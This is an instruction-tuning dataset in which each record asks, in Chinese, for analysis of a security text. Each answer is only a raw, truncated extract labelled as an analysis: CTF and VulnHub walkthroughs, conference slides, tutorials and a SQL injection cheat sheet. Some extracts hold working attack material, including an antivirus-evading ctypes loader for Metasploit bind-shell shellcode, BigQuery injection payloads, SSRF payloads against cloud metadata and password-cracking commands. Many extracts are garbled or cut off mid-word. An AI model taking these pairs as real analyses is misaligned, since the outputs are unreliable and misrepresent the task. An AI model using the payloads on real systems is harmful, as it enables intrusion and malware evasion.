{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PumpkinRaising-WalkThrough --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **靶机地址** - https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinraising,324/ **Description** Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinRaising is Level 2 of series of 3 machines under Mission-Pumpkin v1.0. The Level 1 ends by accessing PumpkinGarden_Key file, this level is all about identifying 4 pumpkin seeds (4 Flags - Seed IDs) and gain access to root and capture final Flag.txt file. **知识点** - 字符加解密 - 流量分析 - GPG爆破 - rbash逃逸 - 图片隐写 **实验环境** `环境仅供参考` - VMware Workstation 15 Pro - 15.0.0 build-10134415 - kali : NAT 模式,192.168.141.134 - 靶机 : NAT 模式 --- # 信息收集 开始进行 IP 探活 ```bash nmap -sP 192.168.141.0/24 ``` 排除法,去掉自己宿主机网关,这里 `192.168.141.129` 是靶机的地址 扫描开放端口 ```bash nmap -T5 -A -v -p- 192.168.141.129 ``` web 和 ssh,先看看 web 源码中有段 base64,解出来不是关键内容 同时有个链接 http://192.168.141.129/pumpkin.html ,查看下里面源码 里面这段是 base32,我拿64解了半天 下载这个流量文件,wireshark 分析一下Ctrl+Alt+Shift+T,切换跟踪 tcp 流 其中提到了种子 ID 50609,先记着,之后应该会用的到 同时 http://192.168.141.129/pumpkin.html 页面最底端还有一串字符 hex 解一下 ``` Yay! Appreciate your patience :) All things are difficult before they become easy. Acorn Pumpkin Seeds ID: 96454 Do, remember to inform Jack to plant all 4 seeds in the same order. ``` 种子 ID:96454 在 robots 文件中发现它提供了一些信息,访问 http://192.168.141.129/robots.txt 下面3个url都有内容 - http://192.168.141.129/underconstruction.html - http://192.168.141.129/hidden/note.txt - http://192.168.141.129/seeds/seed.txt.gpg 先看下 note.txt 看上去像是账号密码,ssh 试了下都无法登录 说不定可以用来解 seed.txt.gpg,试下 ``` wget http://192.168.141.129/seeds/seed.txt.gpg gpg --decrypt seed.txt.gpg ``` 解不了,尝试用 john 跑出来 ```bash gpg2john seed.txt.gpg > hash john hash john --wordlist=wordlist.txt hash", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# flag 包 --- **Source & Reference** - [Go语言flag包:命令行参数解析](http://c.biancheng.net/view/5573.html) --- 几个概念: - 命令行参数(或参数):是指运行程序提供的参数 - 已定义命令行参数:是指程序中通过 flag.Xxx 等这种形式定义了的参数 - 非 flag(non-flag)命令行参数(或保留的命令行参数):先可以简单理解为 flag 包不能解析的参数 ```go package main import ( \"flag\" \"fmt\" \"os\" ) var ( h, H bool v bool q *bool D string Conf string ) func init() { flag.BoolVar(&h, \"h\", false, \"帮助信息\") flag.BoolVar(&h, \"H\", false, \"帮助信息\") flag.BoolVar(&v, \"v\", false, \"显示版本号\") // flag.StringVar(&D, \"D\", \"deamon\", \"set descripton \") flag.StringVar(&Conf, \"Conf\", \"/dev/conf/cli.conf\", \"set Conf filename \") // 另一种绑定方式 q = flag.Bool(\"q\", false, \"退出程序\") // 像flag.Xxx函数格式都是一样的第一个参数表示参数名称 // 第二个参数表示默认值第三个参数表示使用说明和描述. // flag.XxxVar这样的函数第一个参数换成了变量地址 // 后面的参数和flag.Xxx是一样的. // 改变默认的 Usage flag.Usage = usage flag.Parse() var cmd string = flag.Arg(0) fmt.Printf(\"-----------------------\\n\") fmt.Printf(\"cli non=flags : %s\\n\", cmd) fmt.Printf(\"q: %b\\n\", *q) fmt.Printf(\"descripton: %s\\n\", D) fmt.Printf(\"Conf filename : %s\\n\", Conf) fmt.Printf(\"-----------------------\\n\") fmt.Printf(\"there are %d non-flag input param\\n\", flag.NArg()) for i, param := range flag.Args() { fmt.Printf(\"#%d :%s\\n\", i, param) } } func main() { flag.Parse() if h || H { flag.Usage() } } func usage() { fmt.Fprintf(os.Stderr, `CLI: 8.0 Usage: Cli [-hvq] [-D descripton] [-Conf filename] `) flag.PrintDefaults() } ``` flag 包实现了命令行参数的解析大致需要几个步骤: **flag 参数定义或绑定** 定义 flags 有两种方式: 1. flag.Xxx()其中 Xxx 可以是 IntString 等;返回一个相应类型的指针如: ```go var ip = flag.Int(\"flagname\", 1234, \"help message for flagname\") ``` 2. flag.XxxVar()将 flag 绑定到一个变量上如: ```go var flagvar int flag.IntVar(&flagvar, \"flagname\", 1234, \"help message for flagname\") ``` 另外还可以创建自定义 flag只要实现 flag.Value 接口即可(要求 receiver 是指针)这时候可以通过如下方式定义该 flag: ```go flag.Var(&flagVal, \"name\", \"help message for flagname\") ``` 命令行 flag 的语法有如下三种形式:-flag // 只支持 bool 类型 -flag=x -flag x // 只支持非 bool 类型 **flag 参数解析** 在所有的 flag 定义完成之后可以通过调用 `flag.Parse()` 进行解析. 根据 `Parse()` 中 for 循环终止的条件当 parseOne 返回 falseni", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow I Learned to Stop Fuzzing and Find More Bugs Jacob West Fortify Software August 3-5, 2007 Las Vegas Agenda Introduction to fuzzing What we mean by fuzzing Challenges with fuzzing Introduction to static analysis How static analysis works Examples of bugs static analysis is good at finding Untapped potential: Customization Experiment Fuzzing versus static analysis Conclusion What is Fuzzing? Encompasses runtime testing that attempts to induce faults in software systems by inputting random or semi-random values Introduced by Barton Miller at the University of Wisconsin, Madison in 1990 (cs.wisc.edu/~bart/fuzz/) Examples of Tools Were talking about tools such as: SPIKE www.immunitysec.com/resources-freesoftware.shtml Peach http://peachfuzz.sourceforge.net PROTOS http://www.ee.oulu.fi/research/ouspg/protos/  and many more But not specialized black box scanning tools: Cenzic SPI Dynamics (except SPI Fuzzer) Watchfire The Inventors Thoughts on Fuzzing 1990: [Fuzzing] is not a substitute for a formal verification or testing procedures, but rather an inexpensive mechanism to identify bugs 1995: While [fuzzing] is effective in finding real bugs in real programs, we are not proposing it as a replacement for systematic and formal testing. 2000: Simple fuzz testing does not replace more extensive formal testing procedures. - Barton Miller Woulda, Coulda, Shoulda SC-L Digest, Vol 3, Issue 118: I would assume that \"smart\" fuzzing could have lots of manipulations of the HH:mm:ss.f format, so this might be findable using black box testing. - Steve Christey Woulda, Coulda, Shoulda http://blogs.msdn.com/sdl It turns out none of the .ANI fuzz templates had a second anih record. This is now addressed, and we are continually enhancing our fuzzing tools to make sure they add manipulations that duplicate arbitrary object elements better. - Michael Howard How Fuzzing Works Identify sources of input to a program Permute or generate pseudorandom input Use an oracle to monitor for failures", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1119-win-Seatbelt自动收集信息 ## 来自ATT&CK的描述 一旦在系统或网络中建立立足点攻击者就可以使用自动化技术来收集内部信息执行此技术的方法可以包括使用命令和脚本解释器来搜索和复制适合标准的信息指符合攻击者收集的数据例如在特定时间间隔的文件类型位置或名称此功能也可以内置到远程访问工具中 该技术可以结合使用其他技术例如文件和目录发现以及横向工具传输以识别和移动文件 ## 测试案例 Seatbelt是一个C项目可以用来对主机进行安全检查在进攻和防御的角度都能发挥作用 通过一条命令就能够获得当前主机的多项配置信息方便实用 在实际渗透测试环境中可以利用Seatbelt工具做一些自动化的信息收集收集的信息很多包括不限于google历史记录用户等等当有了chrome的访问历史时就可以知道该用户访问的一些内部站点的域名/IP可以提高内网资产的摸索效率 ## 检测日志 Windows安全日志sysmon日志 ## 测试复现 Seatbelt的编译和使用 1.编译 工程地址 <https://github.com/GhostPack/Seatbelt> 支持.NET 3.5和4.0 需要使用Visual Studio2017或者更高的版本进行编译 2.使用 需要传入参数指定具体的命令例如运行所有检查并返回所有输出 Seatbelt.exe -group=all -full 详细的命令可参考项目的说明 <https://github.com/GhostPack/Seatbelt#command-line-usage> ## 测试留痕 数据集来源<https://github.com/OTRF/Security-Datasets/blob/master/datasets/atomic/windows/discovery/host/cmd_seatbelt_group_user.zip> ```yml { [-] @timestamp: 2020-11-02T04:39:11.671Z Channel: Security CommandLine: Seatbelt.exe -group=user EventID: 4688 Hostname: WORKSTATION5 Keywords: 0x8020000000000000 Level: 0 MandatoryLabel: S-1-16-12288 Message: A new process has been created. Creator Subject: Security ID: S-1-5-21-3940915590-64593676-1414006259-500 Account Name: wardog Account Domain: WORKSTATION5 Logon ID: 0xC61D9 Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x2f04 New Process Name: C:\\Users\\wardog\\Desktop\\Seatbelt.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x3048 Creator Process Name: C:\\Windows\\System32\\cmd.exe Process Command Line: Seatbelt.exe -group=user NewProcessId: 0x2f04 NewProcessName: C:\\Users\\wardog\\Desktop\\Seatbelt.exe ParentProcessName: C:\\Windows\\System32\\cmd.exe ProcessId: 0x3048 ProviderGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} SourceName: Microsoft-Windows-Security-Auditing SubjectDomainName: WORKSTATION5 SubjectLogonId: 0xc61d9 SubjectUserName: wardog SubjectUserSid: S-1-5-21-3940915590-64593676-1414006259-500 TargetDomainName: - TargetLogonId: 0x0 TargetUserN", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 2021-10-G60攻防大赛 --- ## crypto1 凯撒加密 flag{7eb61b29-8f38-40cd-8ec5-50a3f1f9d8b8} --- ## crypto2 ``` AABA ABAA AB BBA BBBBABB AAAAB BAA BAAAA AAABB BAAA BBBBA A AAAAB BABBAB AABA A BAAAA AAABB BABBAB AAAAB BAAAA BBAAA BABA BABBAB BBBBA AAAAA BBBBB AAAAB BABBAB BAAA BBBAA BAAA AABBB BBBAA A ABBBB AAAAB AAAAA BBBAA BAAA BAAA BBBBBAB ``` 摩斯电码 ``` A > . B > - ..-. .-.. .- --. ----.-- ....- -.. -.... ...-- -... ----. . ....- -.--.- ..-. . -.... ...-- -.--.- ....- -.... --... -.-. -.--.- ----. ..... ----- ....- -.--.- -... ---.. -... ..--- ---.. . .---- ....- ..... ---.. -... -... -----.- ``` flag{4d63b9e4-fe63-467c-9504-b8b28e1458bb} --- ## crypto3 e = 2953544268002866703872076551930953722572317122777861299293407053391808199220655289235983088986372630141821049118015752017412642148934113723174855236142887 N = 6006128121276172470274143101473619963750725942458450119252491144009018469845917986523007748831362674341219814935241703026024431390531323127620970750816983 flag = 4082777468662493175049853412968913980472986215497247773911290709560282223053863513029985115855416847643274608394467813391117463817805000754191093158289399 \"factor(6006128121276172470274143101473619963750725942458450119252491144009018469845917986523007748831362674341219814935241703026024431390531323127620970750816983)\" md 原题 ```py from Crypto.Util.number import * from tqdm import tqdm e = 2953544268002866703872076551930953722572317122777861299293407053391808199220655289235983088986372630141821049118015752017412642148934113723174855236142887 N = 6006128121276172470274143101473619963750725942458450119252491144009018469845917986523007748831362674341219814935241703026024431390531323127620970750816983 c = 4082777468662493175049853412968913980472986215497247773911290709560282223053863513029985115855416847643274608394467813391117463817805000754191093158289399 for dp in tqdm(range(3, 1<<20, 2)): tmp = e*dp-1 t = pow(3, tmp, N) p = GCD(N, t-1) if p != 1: print(\"find p!\") q = N//p phi = (p-1)*(q-1) d = inverse(e, phi) m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nViolent(Python( ! DEF(CON(23! Fri.,(Aug(8,(2015,(9?1! Sam(Bowne( City(College(San(Francisco! Slides(and(projects(at(samsclass.info( Bio$ CNIT$124$ Advanced$Ethical$Hacking$ Violent$Python$  Good$coding$principles$  ExcepBon$handling$  Modular$design$  OpBmizaBon$  CommenBng$  Flow$charts$  FORGET$THEM$ALL$ Violent$Python$  We$are$hackers$  We$are$here$to$BREAK$STUFF$  It$should$be$fast$and$easy$for$a$complete$ novice$to$hack$together$a$simple$script$to$do$ something$fun!$ Projects$ AnBvirus$ $ Ungh!$$Good$God$y'all...$ $ What$is$it$GOOD$For?$ Mikko$Hypponen$Video$ Metasploit$Payloads$ Metasploit$  Hundreds$of$payloads$  The$simplest$one:$bind_tcp$  Listens$on$a$TCP$port$for$commands$ Simple$Reverse$Shell$  One$command$to$produce$very$simple$ Windows$EXE$malware$ AnBvirus$Catches$It$ Norton$v.$Shell.exe$ Norton$IdenBfies$the$Metasploit$ Packer$ VirusTotal:$37/49$DetecBons$ How$to$ Become$ 007$ Python$v.$AV$ Round$1$ shell_bind_tcp$ Export$Metasploit$Payloads$to$C$ Use$Ctypes$Python$Library$ Compile$it$on$Windows$  Install$these$$things,$in$order$  Python$2.7$  PyWin32$  pipbWin$  PyInstaller$  This$creates$an$EXE$file$that$listens$on$a$TCP$ port$ DEMO$  On$Kali$ msfpayload windows/shell_bind_tcp C > foo nano foo  Change$top$to$ from ctypes import * shellcode = (  Change$bocom$to$ ); memorywithshell = create_string_buffer(shellcode, len(shellcode)) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell() DEMO$  On$Windows,$in$pipbWin:$ venv -c -i pyi-env-name pyinstaller --onefile --noconsole foo VirusTotal:$1/50$DetecBon$ Norton$Support$  I$Tweeted$about$this,$and$@NortonSupport$ replied$  VirusTotal$is$not$a$fair$test,$because$real$ installed$Norton$uses$HeurisBc$Scanning$  @NortonSupport$gave$me$a$link$for$a$30bday$ trial$version$:)$ Norton$Wins!$ Kaspersky$Wins!$  Avast!$doesn't$detect$it$  Kaspersky$detects$it$as$ HEUR:Trojan.Win32.Generic$ Python$v.$AV$ Round$2$ shell_bind_tcp$ with$a$delay$ DEMO$  On$Kali$ cp foo foo2 nano foo2 x=raw_input(\"Press Enter to conti", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJDK 7u21分析 0x01 写在前 JDK7u21原gadget链的构造分经典在对于其构造及思想学习后写下本作为笔记 0x02 所需的知识点 JDK7u21这个链了很多的Java基础知识点主要如下 Java 反射 javassist 动态修改类 Java 静态类加载 Java 动态代理 hash碰撞 为了便家理解此因此我会对这些知识点进简单介绍如果都了解的朋友可以直接 翻到后的分析过程 0x03 基础知识 1Java 反射 反射 (Reflection) 是 Java 的特征之在C/C++中是没有反射的反射的存在使得运中的 Java 程序能够获取身的信息并且可以操作类或对象的内部属性那么什么是反射呢 对此 Oracle 官有着相关解释 Reflection enables Java code to discover information about the fields, methods and constructors of loaded classes, and to use reflected fields, methods, and constructors to operate on their underlying counterparts, within security restrictions. 反射使Java代码能够发现有关已加载类的字段法和构造函数的信息并在安全限 制内使反射的字段法和构造函数对其底层对应的对象进操作 简单来说通过反射我们可以在运时获得程序或程序集中每个类型的成员和成员的信 息同样的JAVA的反射机制也是如此在运状态中通过 Java 的反射机制对于任意 个类我们都能够判断个对象所属的类对于任意个类都能够知道这个类的所有属性 和法对于任意个对象都能够调它的任意个法和属性这种动态获取的信息以 及动态调对象的法的功能称为Java语的反射机制 既然利Java的反射机制我们可以视类法变量访问权限修饰符可以调任何类的任 意法访问并修改成员变量值那么这可能导致安全问题如果个攻击者能够通过应 程序创建意外的控制流路径那么就有可能绕过安全检查发起相关攻击假设有段代码如 下 存在个字段为name当获取户请求的name字段后进判断如果请求的是 Delect 操 作则执DelectCommand 函数若执的是 Add 操作则执 AddCommand 函数如 果不是这两种操作则执其他代码 此时假如有位开发者看到了这段代码他觉得可以使Java 的反射来重构此代码以减少代 码如下所示 String name = request.getParameter(\"name\"); Command command = null; if (name.equals(\"Delect\")) { command = new DelectCommand(); } else if (ctl.equals(\"Add\")) { command = new AddCommand(); } else { ... } command.doAction(request); 1 2 3 4 5 6 7 8 9 10 String name = request.getParameter(\"name\"); Class ComandClass = Class.forName(name + \"Command\"); Command command = (Command) CommandClass.newInstance(); command.doAction(request); 1 2 3 4 这样的重构看起来使得代码减少消除了if/else块且可以在不修改命令分派器的情况下 添加新的命令类型但是如果没有对传进来的name字段进限制那么我们就能实例化实 现Command接的任何对象从导致安全问题实际上攻击者甚不局限于本例中的 Command接对象是使任何其他对象来实现如调系统中任何对象的默认构造函 数再如调Runtime对象去执系统命令这就可能导致远程命令执漏洞 更多关于反射的内容具体可以参考我以前写的这篇章https://www.cnpanda.net/codeaudi t/705.html 2javassist 动态修改类 Javaassist 就是个来处理 Java 字节码的类库其主要优点在于简单便捷户不需要了 解虚拟机指令就可以直接使Java编码的形式并且可以动态改变类的结构或者动态成 类 Javassist中最为重要的是ClassPoolCtClass CtMethod 以及 CtField这个类 ClassPool个基于HashMap实现的CtClass对象容器其中键是类名称值是表示该类 的CtClass对象默认的ClassPool使与底层JVM相同", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA FAILURE OF IMAGINATION: Kwikset Smartkey and Insecurity Engineering ONE OF THE MOST SECURE and INSECURE LOCKS IN AMERICA KWIKSET SMARTKEY #1: IS SMARTKEY SECURE? Brian: 06/25/2013 1105 A.M. #2: IS SMARTKEY SECURE? Satima: 06/24/2013 4:26 P.M. #3: IS SMARTKEY SECURE? Raymond: 06/25/2013 3:58 P.M. KWIKSET LOCKS A Spectrum Brands Company MILLIONS IN USE IN AMERICA AND CANADA HOMES, APARTMENTS, BUSINESSES INEXPENSIVE: COST: $20-$30 MODELS:  Pin tumbler, 5 and 6 pin  Smartkey, 5 pin  Deadbolts  Electronic + override ONE OF THE MOST POPULAR LOCKS IN U.S. MILLIONS SOLD EVERY YEAR  COMMON KEYWAY: WEISER, BALDWIN FOR MORE THAN FIFTY YEARS DIVERSE PRODUCT LINE  Deadbolts  Rim  Lever handle  Electronic KWIKSET DISTRIBUTION WIDE PRODUCT LINE HOMES, APARTMENTS, BUSINESS, COMMERCIAL KWIKSET, WEISER, BALDWIN: The Basics PIN TUMBLER AND SMARTKEY 5 or 6 PIN CONVENTIONAL CYLINDERS  Many configurations 5 PIN SMARTKEY PROGRAMMABLE COMMON KEYWAYS, NO SECURITY NO DUPLICATION PROTECTION NOT HIGH SECURITY MAINLY RESIDENTIAL AND APARTMENTS KWIKSET HISTORY ORIGINAL PIN TUMBLER DESIGN  Rim cylinder  Deadbolt  Key-in-knob design EASILY COMPROMISED MOST POPULAR UNTIL 2008  Smartkey introduced to Canada and U.S. PIN TUMBLER v. SMARTKEY PIN TUMBLER DESIGN NOT SECURE Easy to pick Easy to bump Easy to impression Easy to mechanically bypass Can be master keyed Easy to determine the Top Level MK Limited number of combinations PIN TUMBLER DESIGN: How it works PIN STACKS = SECURITY: Plug can turn: pins at shearline LOCKED: PINS NOT AT SHEARLINE KWIKSET SMARTKEY: Not a pin tumbler lock SMARTKEY ATTRIBUTES 5 PIN ONLY 6 DEPTH INCREMENTS SINGLE SIDEBAR SECURITY EXTREMELY PICK RESISTANT UL437 CANNOT BE BUMPED CANNOT BE IMPRESSIONED INSTANT PROGRAMMABILITY TO ANY KEY CANNOT BE MASTER KEYED MORE ATTRIBUTES ONE PRIMARY KEYWAY BHMA 156.5 GRADE 1 RATING UL 437 RATING SPECIAL KEY CONTROL DEADBOLT AS ALTERNATIVE TO MK SYSTEM SMARTKEY DESIGN PROGRAMMABLE SLIDERS SIDEBAR =SMARTKEY SECURITY MASTER KEY SYSTEMS: Pin ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmacOS 上的逻辑提权漏漏洞洞 菜丝 @蚂蚁金金服光年年实验室 关于我  花名菜丝就职于蚂蚁金金服光年年安全实验室  从事桌面端和移动端IoT 设备安全漏漏洞洞的攻防安全工具开发从移动应 用安全到智能设备均有涉猎  BlackHat, Xdef 等国内外会议演讲者  开源了了 iOS 应用分析工具 Passionfruit了了解一下 逻辑漏漏洞洞的特点 粗暴暴简单 很少需要涉及底层细节对 新手更更友好 fuzz 不不友好 较难通过自动化模糊测试 利利用稳定 不不破坏内存相对更更稳定 脑洞洞 条件的串串联跨组件甚至跨 编程语言的组合 逻辑漏漏洞洞  滥用软件既有的特性  开发者对 API 误用  API 本身设计和实现的缺陷 攻击方式  在高权限进程中直接执行行代码  动态模块加载  滥用高权限进程的功能  子进程创建  文件系统读写等  entitlement  滥用 ipc 返回的资源  文件描述符  mach port 模式  目标沙箱规则更更宽松或没有沙箱的进程高权限如 root 用户的进程  LaunchDaemons  攻击面  进程间通信  Named pipe, (domain) socket, MIG, Distributed Objects, AppleEvents 等  特别是 XPC  可进程间共享的资源共享内存文件系统等 寻找攻击对象  简单地 ps -U root 看一下不不会显示按需启动的服务进程  macOS 下具有 root 权限的启动项分布在如下位置  /System/Library/LaunchDaemons  /Library/LaunchDaemons  launchctl dumpstate 可列列出所有 mach 服务的信息  第三方软件的服务通常会使用 SMJobBless 安装到 /Library/ PrivilegedHelperTools 某安全软件本地权限提升  PrivilegedHelper 中安装了了 **MacMgrAgent以 root 权限执行行  在固定的路路径下创建文件使用 named pipe 实现 IPCsem_post 和 sem_wait 来做进程间同步  使用自定义的协议序列列化数据包  所有 FIFO 文件权限为 0777所有进程可自由读写  pipe ls -l total 24600 -rw-rw-rw- 1 cc admin 8 Aug 21 11:21 qm_fsmon_lk -rwxrwxrwx 1 root admin 2097152 Aug 21 11:13 qm_fsmon_rd -rwxrwxrwx 1 root admin 2097152 Aug 21 11:13 qm_fsmon_wr -rw-rw-rw- 1 cc admin 8 Aug 21 12:28 qm_proc_lk -rwxrwxrwx 1 root admin 2097152 Aug 21 11:13 qm_proc_rd -rwxrwxrwx 1 root admin 2097152 Aug 21 11:13 qm_proc_wr -rw-rw-rw- 1 cc admin 8 Aug 21 12:40 qm_sock_lk -rwxrwxrwx 1 root admin 2097152 Aug 21 11:13 qm_sock_rd -rwxrwxrwx 1 root admin 2097152 Aug 21 11:13 qm_sock_wr 某安全软件本地权限提升  任意进程可伪造请求发送给 agent 进程 触发特权操作  exec_command 直接将用户传入的字 符串串提交给 system 函数  rooted Calculator  于 2017 年年 8 月报告并修复 old school setuid  同样适用于其他 Unix 系统  具有 sticky 标志位的文件可以调用 setuid 获得 root 权限  思路路  错误地处理理 argv 或环境变量量例例如将传入的参数作为命令执行行  具有 root 权限的进程通过 ipc 写入内容可控的文件 经典的 rootpipe (CVE-2015-1130)  root 权限执行行的 writeconfig 进程暴暴露露了了 XPC 接口可在指定路路径创建任意 内容任意属性的文件  普通进程滥用 XPC 接口可创建具有 setuid 属性的文件写入恶意代码后执 行行即可获得 root 权限  2014 年年被报告给苹果此前可能已经被在野利利用多年年由于修复不不完善 被多次绕过详见 DECON 23 - Stick That In Your (root)Pipe & Smoke It h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n\"\"\" WSGI config for cve201914234 project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ \"\"\" import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cve201914234.settings') application = get_wsgi_application()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Google BigQuery SQL Injection ## Summary * [Detection](#detection) * [BigQuery Comment](#bigquery-comment) * [BigQuery Union Based](#bigquery-union-based) * [BigQuery Error Based](#bigquery-error-based) * [BigQuery Boolean Based](#bigquery-boolean-based) * [BigQuery Time Based](#bigquery-time-based) * [References](#references) ## Detection * Use a classic single quote to trigger an error: `'` * Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...``` ```ps1 # Gathering project id select @@project_id # Gathering all dataset names select schema_name from INFORMATION_SCHEMA.SCHEMATA # Gathering data from specific project id & dataset select * from `project_id.dataset_name.table_name` ``` ## BigQuery Comment ```ps1 select 1#from here it is not working select 1/*between those it is not working*/ ``` ## BigQuery Union Based ```ps1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name# true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name# ' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name# ``` ## BigQuery Error Based ```ps1 # Error based - division by zero ' OR if(1/(length((select('a')))-1)=1,true,false) OR ' # Error based - casting: select CAST(@@project_id AS INT64) dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC# ``` ## BigQuery Boolean Based ```ps1 ' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'# ``` ## BigQuery Time Based * Time based functions does not exist in the BigQuery syntax. ## References * [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - Feb 14](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac) * [BigQuery Documentation ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCompliance: The Enterprise Vulnerability Roadmap    Weasel Nomad Mobile Research Centre weasel@nmrc.org Introduction The Semi-Security State of Compliance  Overview of Compliance Benefits and Standards  Things Compliance Gets Wrong  Detrimental effects of Compliance Compliance Benefits  Old, hard-to-sell controls finally being implemented  Standardization of common controls  Credentials for lazy people who dont want to work or go to school (OK, so thats not a benefit) Compliance Standards  COBIT  PCI DSS  HIPAA Compliance Standards (Cont)  GLBA  SOX  ISO  ITAF The Psychological Impact of Compliance on the Enterprise  False Senses of Security  Misinterpretations of concepts  Budgetary and Resource Shifting and Mayhem  The Pass the Audit vs. Secure the Systems Paradox Compliance brings us a new fingerprinting foundation  Standards == Defined Attack Matrix  Passwords (length, complexity, age, etc), Data Retention, Encryption Standards, Focal Points  Data retention  What data is known to exist before it is even found  Configuration Management  Workstation, Server, Data Centers, Infrastructures  Policy  Policy-level weaknesses and vulnerabilities Other Standardizations  Encryption requirements  standard algorithms  No time wasted forcing non-compliant algorithms  sensitive data flagging  Encryption flags the juicy stuff  Key management Compliance is the Self-Devouring Serpent  Misrepresented/Misinterpreted Postures  Conflict of Interests  Governance Hypocrisies  \"Secure\" vs. \"Passing Audit\" paradox  Things you may not have known about compliance boards The Anti-Progression Trap  Compliancy can lock organizations into old technologies and architectures  Requiring Firewalls where emerging concepts dont call for one  Anti-virus is Dead Notes on the \"Risk Bandwagon\"  Definition  A new mentality is evolving  Knowing the enemy before you know who it is Case Examples Conclusion Q&A Credits Links", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWhen TLS Hacks You JOSHUA MADDUX Demo Overview  Where I Started  Testing Approach  Implications  Concrete Vulnerabilities  Defense SSRF  Send a URL, server hits it SSRF  Send a URL, server hits it  Common in webhooks & Apple Pay support https://www.youtube.com/watch?v=m4BxIf9PUx0 EC2 IMDS V1 Easy! Just sent webkit.org http://169.254.169.254 Webkit.org: Apple Pay SSRF EC2 IMDS V1 Webkit.org: Apple Pay SSRF EC2 IMDS V1 Webkit.org: Apple Pay SSRF Website 2: no data back  EC2 IMDS V1 Webkit.org: Apple Pay SSRF Website 2: no data back  Website 3: PUT request  PUT 405 not allowed EC2 IMDS V1 Webkit.org: Apple Pay SSRF Website 2: no data back  Website 3: PUT request  PUT Website 3: validation  405 not allowed Getting around limitations Past approaches Weird protocols  gopher://localhost:11211/ _%0aset%20foo%20...  Doesnt work against modern libraries SNI injection  https://127.0.0.1 %0D%0AHELO orange.tw%0D%0AMAIL FROM:25/  From Orange Tsais talk A new era of SSRF https://www.youtube.com/watch ?v=2MslLrPinm0  Really cool, but depends on specific bugs Step 1 jmaddux.com jmaddux.com Step 2 Saved Payload ??? Same session? Step 1 jmaddux.com:25 35.x.x.x DNS server Step 2 35.x.x.x Step 3 35.x.x.x DNS server jmaddux.com:25 SMTP on localhost Hello + Payload Testing approach redis config Custom TLS Alternating DNS Server Internet IP of Custom TLS box 127.0.0.1 redis config Custom TLS Alternating DNS Server Just netcat Internet IP of Custom TLS box IP of Netcat box Custom TLS Alternating DNS Server Code available at: https://github.com/jmdx/TLS-poison Fork of https://github.com/ctz/rustls Thanks to Akash Idnani for writing the redis-based configuration stuff Fork of https://github.com/SySS-Research/dns-mitm Implications Whats now vulnerable Almost-SSRF Stuff on local ports Outbound TLS sessions Almost-SSRF Stuff on local ports Outbound TLS sessions Surprisingly common  OIDC discovery (sometimes)  Webpush  Webmention  SVG conversion  URL-based XXE  Scraping  Webhooks  PDF renderers w", "category": "text_analysis", "source": "security_papers"}
